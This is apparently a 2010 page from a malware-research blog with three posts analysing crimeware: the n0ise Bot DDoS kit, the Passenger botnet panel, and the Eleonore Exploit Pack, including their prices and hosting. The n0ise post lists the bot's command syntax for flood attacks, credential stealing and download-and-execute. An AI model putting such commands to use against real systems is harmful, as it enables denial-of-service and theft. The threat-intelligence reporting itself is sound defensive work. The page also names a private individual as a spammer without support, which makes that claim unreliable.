MalwareIntelligence is a site dedicated to research on all matters relating to anti-malware security, criminology computing and information security in general, always from a perspective closely related to the field of intelligence.

29.6.10

n0ise Bot. Crimeware particular purpose for DDoS attacks

DDoS attacks are not a trivial problem, and various web applications in this style, such as BlackEnergy have been used to run campaigns of massive attacks, in the case of BE during the conflict between Russia and Georgia.

The impact of such threats is extremely critical, and under this flag in the circuit enters the business that is channeled through crimeware, a web application called n0ise Bot German origin, although not yet have a good impact on criminal ecosystem, takes on the black market for some time.

n0ise Bot is designed exclusively to recruit zombies and executing attacks Distributed Denial of Service.

It has a minimalist design but offers the information needed to manage the zombies to be used as a means to carry out DDoS attacks.

The commands that can be used through the basic configuration of this crimeware are:
  • Syn-Flood - synflood*Host*Port*Threads*Sockets
  • HTTP-Flood - httpflood*Host*Threads
  • UDP-Flood - udpflood*Host*Port*Threads*Sockets*Packetsize
  • ICMP-Flood - icmpflood*Host*Port*Threads*Sockets*Packetsize
  • Multi Stealer - steal*Link to Uploadscript
  • Download and Execute - downandexe*LinkToFile
  • Visit Page - visit*Link
  • Bot Update - update*LinkToNewBot
  • Remove Bot - remove*Name
The business strategy employed for the sale of crimeware, adds to the tendency to whiten their existence through the advertising displayed across the website "official" crimeware called Coding-Revolutions, which also sell other applications for handling malicious code for "secure communications" under the slogan "Willkommen im Shop von neuen n0ise Malware!" (Something like "Welcome to the new store n0ise malware").

This business model has been used in other opportunities to promote Unique Sploits Pack, YES Exploit System and Mariposa Botnet.

As shown in the image, n0ise Bot cost is € 50 (only the binary without the constructor) and € 250 (binary lifetime including future upgrades) transactions are made through the service paysafecard, a payment system online that leaves no traces of those involved in the transactions.

However, since May 2010 the developer has released the second version (2.1) where the cost of the binary is still € 50 but the lifetime value of this low at € 200, perhaps as a consequence of their lack of impact between computer criminals.


Related information

Ver más

26.6.10

Brief review of Passenger Admin Panel

If you 5/6 years ago we were talking about control and centralized management of botnets (C&C) via http, when the massive operating botnets through IRC channels, it was seen as a trend.

After the first appearance of the odd kit, demand began to be high but the supply was poor. However, despite having spent several years, today continue to set trends in crimeware and demand remains high but with the difference that the offer is directly proportional.

Under this scenario every day we witness the appearance of any web application that adds to the offer, exclusively designed to feed the demand, facilitate and manage intelligence "assets" (zombies) of offenders. Another concrete example of this trend is Passenger Admin Panel.



As can be seen in terms of images, Passenger is of Russian origin and apparently it's a private version or designed on demand, as there are no references to its development.

It has only three options. The first of these, the statistics panel which centralises information relating to number of zombies (in this case 16.845), number of active zombies (582) - this information is refreshed every 60 minutes - many recruited zombies per day (36) , number of victims during the past 24 pm (7.349), among other data.




The statistics continue to show data about the versions of the bots and the amount of zombies recruited by each affiliate ID with the number of victims who have (in this case there are two affiliated with zombies 16.842 and 3 respectively), status of the module over Interestingly called Putty Grabber with your records and the number of operating systems involved.


Regarding operating systems that are part of the range of victims of this botnet are:

  • Microsoft Windows 2000 Service Pack 3
  • Microsoft Windows Server 2003    
  • Microsoft Windows Server 2003 Service Pack 1 and 2
  • Microsoft Windows Server 2003 R2 Service Pack 1 and 2
  • Microsoft Windows XP
  • Microsoft Windows XP Service Pack 1, 2 and 3
  • Windows XP by Rushen 10.5 Minimal Service Pack 3
  • Windows Vista (TM) Business    
  • Windows Vista (TM) Business Service Pack 1 and 2
  • Windows Vista (TM) Home Basic
  • Windows Vista (TM) Home Basic Service Pack 1 and 2
  • Windows Vista (TM) Home Premium    
  • Windows Vista (TM) Home Premium Service Pack 1 and 2
  • Windows Vista (TM) Ultimate Service Pack 1 and 2
  • Windows Server (R) 2008 Standard Service Pack 2
Passenger can set the task of updating the bot through a previously assigned URL that points to a file called u.php. However, as mentioned above, the most interesting feature for the offender provides Putty Grabber module, which displays specific information and stores sensitive data for each compromised computer.


Undoubtedly, the crimeware is a very critical problem that operates globally and on a large scale, and the constant emergence of alternatives as specified in this is further evidence of this.

Related Information
State of the art in CRiMEPACK Exploit Pack
Siberia Exploit Pack. Another package of explois I...
RussKill. Application to perform denial of service...
JustExploit. New Exploit kit that uses vulnerabili...
DDoS Botnet. New crimeware particular purpose
T-IFRAMER. Kit for the injection of malware In-the...
Fragus. New botnet framework In-the-Wild
Liberty Exploit System. Alternatively crimeware to...
TRiAD Botnet III. Remote administration of multi-p...

Ver más

23.6.10

State of the art in Eleonore Exploit Pack II

Undoubtedly the crimeware rate exploit pack and malware kit, whether these general purpose, such as ZeuS or as RussKill particular purpose, have become the creme de la creme of computer crime and synonymous with the easy for cybercriminals.

Based on this, one of the fastest growing crimeware over the past six months is Eleonore Exploit Pack. He is currently on the lips of many would-be cyber criminals who use, and safety professionals who have noticed its impact within the crime scene because of its increasingly progressive recruitment of followers, which justifies the reason for investigation.

Earlier this year we gave to know how the developer of this application site was releasing different versions of crimeware and from the final version of the time (1.3.2) to current (1.4.1), things have changed little.


The truth is that, as shown in the image, attack coverage including a considerable number of operating systems, an aspect that also has become a trend for some exploits pack, as the case of Siberia Exploit Pack, until even shares a similar taste to a story in this design.

But again let's review the chronology of the emergence of different versions:

The basis of this botnet is hosted in the U.S., the vendor under the Secured Private Network on ASN22298, it also hosts malware type rogue, fakeAV, some other trojans, variants of ZeuS, even some families Koobface and maintained by business services QuadraNet led by a spammer Israeli named Ilan Mishan, also well known in the offense to give the necessary resources to accommodate hosting activities spam, scam, phishing, pornography, including through other companies such as OC-3 Networks and PacificRack bonded under QuadraNet.




Despite having the C&C in the U.S., the highest rate of activity is in Eastern Europe, just in Ukraine where the largest number of computers whose security has been breached by one of the many exploits that are disseminated Eleonore Exploit Pack.


On the other hand, it's interesting to know the web pages through which refer to the pre-compiled exploits Eleonore. The lists are usually very long and quite varied between subjects, which usually characterize the pages that have sexually explicit content, the spread of FakeAV, casinos and pharmacies online, among others.

Also, another closely linked with the scenario that represents the business of these criminal activities: affiliate programs. In this case, one is promoted for the purchase of web traffic, where the axis of business is to get money through advertising and injected into web pages displayed in popup windows.

Related information
State of the art in Eleonore Exploit Pack
Eleonore Exploits Pack. New Crimeware In-the-Wild
Nueva versión de Eleonore Exploits Pack In-the-Wild
Phishing campaign aimed at players Zynga

Ver más